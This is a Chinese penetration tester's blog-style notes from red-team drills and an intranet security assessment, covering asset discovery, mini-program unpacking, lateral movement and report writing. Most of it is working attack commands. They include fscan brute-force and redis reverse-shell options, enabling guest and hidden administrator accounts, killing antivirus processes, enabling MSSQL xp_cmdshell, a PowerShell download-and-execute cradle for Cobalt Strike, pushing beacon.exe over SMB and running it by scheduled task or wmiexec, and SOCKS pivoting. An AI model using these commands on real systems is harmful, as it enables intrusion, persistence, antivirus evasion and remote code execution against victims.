題記
上個月基本一直在出差,剛變成武松半個月就又變成了希望之光。雖然很忙,但是太充實了,我要把這兩次遇到的問題整理一下,方便下次用的時候直接查命令,也幫助各位查漏補缺。
1 虎王部分整理
總結:打虎的時候,現在由於現在的大老虎武裝到了牙齒,正面突破已經十分不現實了,動不動你的武器就被鎖了,因此現在攻擊更偏向於邊緣資產刷分、小程序、供應鏈攻擊、github信息泄露、釣魚等。經過一些溝通,本次老虎存在的某些脆弱點大致描述一下,1、某系統短信接口(另一個地址)存在shiro反序列化,后來聽說這個地方成了跑馬場,可獲取所有人員信息。2、某資產通過nmap掃出來java組件的一個漏洞,通過此漏洞進入內網。3、github發現某供應商的密碼保存文件,可以直接利用密碼登錄后台管理一堆設備。4、小程序解包發現key值,直接接管小程序的服務器。
邊緣資產搜索技巧
虎王有很多資產,奇奇怪怪,找到他們也有技巧,除了常規的各種fofa語法來回用,更邊緣的可以利用fofa_viewer搜索body="虎王名字",從上到下看看有沒有特別像它的小老虎,有可能有驚喜哦。
小程序源碼獲取技巧
現在更多的人瞄向了小程序,環境安裝我就不描述了,有興趣的看參考文章。
1 對加密的小程序包解密
2 反編譯小程序包解出源碼
反編譯工具鏈接:https://github.com/xuedingmiaojun/wxappUnpacker
命令:bingo.bat wx03b213d.wxapkg
3 解出來的源碼如下
有些開發者失誤就會把配置文件寫在源碼里,例如阿里雲key等,可以直接用工具接管小程序的服務器。
小程序相關站點獲取技巧
這里以觀課堂為例,
點擊更多資料。
可以看到相關網址被安排的明明白白的。
啟用guest賬戶
過程中發現SQL注入,--os-shell拿到服務器權限,發現開啟3389,啟用guest賬戶,加入管理員組,直接遠程桌面登錄上去。
net user guest /active:yes
net localgroup administrators guest /add
登錄上去后抓密碼,抓到密碼就可以直接用抓到的密碼登錄了。
釣魚
釣魚有時候不用靠技巧,純靠感情。可惜的是我們的馬沒過郵件網關。
2 大型內網技巧
前情提要:某大型內網安全評估項目,甲方先給部分拓撲與部分地址段(不全),自己接入辦公區網絡,辦公網絡與監控網、測試網不通,其他自由發揮。目標:檢測內部網絡安全性。
這里划分為整個內網、測試網與監控網以及特殊的域環境。
內網缺陷主要為弱口令,web漏洞,服務器漏洞,默認口令。內網最重要的就是信息收集,大部分時候我們並不需要很多漏洞進行突破,撞庫就能撞出來一大片機器。
存活探測
測試過程中我發現甲方給的資產不全,好東西都沒給呢。
這里采取先探測存活的c段,在對c段進行批量掃描。
首先把甲方給的段整理一下,改成b段(因為甲方機器有策略,arp -a顯示的只有自己當前段的地址),利用fscan對b段單獨掃80端口來確定c段是否存活。
Fscan命令:fscan64.exe -hf .\bduan.txt -o clive.txt -p 80 -np -nopoc
掃出來c段存活后在對c進行批量詳細掃(這里插一句,我忘記了fscan可以加載字典進行爆破,用的是超級弱口令爆破的。)
使用方法:
fscan.exe -h 192.168.1.1/24 (默認使用全部模塊)
fscan.exe -h 192.168.1.1/16 (B段掃描)
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不保存文件、跳過web poc掃描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計划任務反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令執行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加載指定文件的用戶名、密碼來進行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結果保存路徑,默認保存在當前路徑)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看網段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)
fscan.exe -hf ip.txt (以文件導入)
Mssql執行命令
通過撞庫撞出來一堆mssql數據庫的弱口令,通過navicat成功連接。挑選一下,發現一個重要目標,此目標可通全網,我們可以利用它來攻擊我們原本訪問不到的監控區與測試區(且它不出網)。
(1)恢復/刪除xp_cmdshell
exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
exec sp_dropextendedproc 'xplog70.dll'
(2)# 關閉xp_cmdshell
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',0;
RECONFIGURE;
(3)# 啟用xp_cmdshell
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
開啟xp_cmdshell,然后就可以執行命令了。
exec master..xp_cmdshell "whoami"
先把出網的上線CS,因為
首先打開Cobalt Strike:
生成powershell類型的payload:
由於存在單引號,無法直接執行,將payload進行base64加密:http://www.jackson-t.ca/runtime-exec-payloads.html
最后成功上線CS。能上線的都上線了,最重要的不出網(我能ping通它,它不能ping我)就留着等最后在搞,反正能執行命令,也是system權限。
創建隱藏賬戶加入管理員組
因為上線不了cs,這台服務器又十分重要,因此我采取創建一個隱藏賬戶加管理組的方法(目標機器裝有亞信殺軟,另外注意測試過程關防火牆導致了機器死掉了,危險操作。),殺軟啥都沒攔,但我還是習慣性kill掉了,亞信進程dsa~,notifi~,詳細的就不說了,命令為taskkill /f /im 程序名。
創建隱藏賬戶:
net user mm$ 123.com /add
net localgroup administrators mm$ /add
遠程桌面(查找遠程桌面修改后的端口)
我們創建隱藏賬戶之后想辦法登錄目標主機,發現RDP服務被改了端口。
tasklist /svc | find "Ter"
可以看到 TermService 的進程 ID 是 1764。
再執行如下命令:
netstat -ano | find "1764"
即可看到服務所使用的端口,如下圖所示是 3389(此處僅測試用)
利用跳板機跳網段掃描攻擊
知道RDP端口后,通過創建的用戶遠程連接過去,這里想要跳網段我想到兩種方法,一是正向代理過去,二是把fscan上傳到目標機器,用目標機器掃原本不通的測試區與監控區。這里我兩種都做了,下面介紹ew正向代理。
ew正向代理
上傳ew上傳到目標機器,命令行運行ew_win32.exe -s ssocksd -l 9000,本地自己開啟proxifier掛上9000端口走目標機器的流量對測試區與監控區做測試。
CS使用powershell上線
首先打開Cobalt Strike:
生成powershell類型的payload:
會生成powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://ip/a'))"這種payload,運行即可。
smb定時任務上線CS
撞出smb密碼后,可用smb上線cs如果有殺軟攔截的話,可以找找遠程桌面端口,直接用賬號密碼連過去。
net use \\ip /user:administrator "mima" //連接smb
dir \\ip\C$ //查看是否連上
copy C:\beacon.exe \\ip\C$ //把木馬上傳到目標機器
schtasks /create /s ip /u administrator /p "mima" /sc MINUTE /mo 1 /tn test /tr "C:\\beacon.exe" //設置test計划任務每分鍾執行
schtasks /Delete /tn "test" /F //刪除定時任務
后補:
因為當時有些上線失敗的情況,懷疑是因為內部有殺軟。
通過學習大佬文章,發現還有如下方式。上線,聽說可以繞過殺軟。
ipc: net use \ip\ipc$ 密碼 /user:用戶名 \進行ipc連接 copy 某盤符木馬 \ip\c$ \將拿到的服務器的木馬傳至對方的c盤 wmi:wmiexec ./administrator:admin!@#45@ip "cmd.exe /c c:/beacon.exe" \執行傳在c盤木馬
內網log4j2探測
內網測試,推薦這個工具。
PPT匯報編寫
1、先總結所有問題,對整體概況進行分析,嚴重性自己把握;
2、分3種,測試范圍、發現問題、給出意見;
3、把每個問題舉幾個例子支撐。
3 參考文章
查看服務器遠程桌面端口命令,Windows系統服務器遠程桌面端口查看和修改方法:https://blog.csdn.net/weixin_36453829/article/details/119227566
【實戰篇】從mssql注入到上線CobaltStrike:https://cloud.tencent.com/developer/article/1810727
逆向微信小程序:http://dabojava.cn/2021/04/30/unpack/wx-applet/#%E4%BB%A3%E7%A0%81%E5%8C%85%E8%A7%A3%E5%AF%86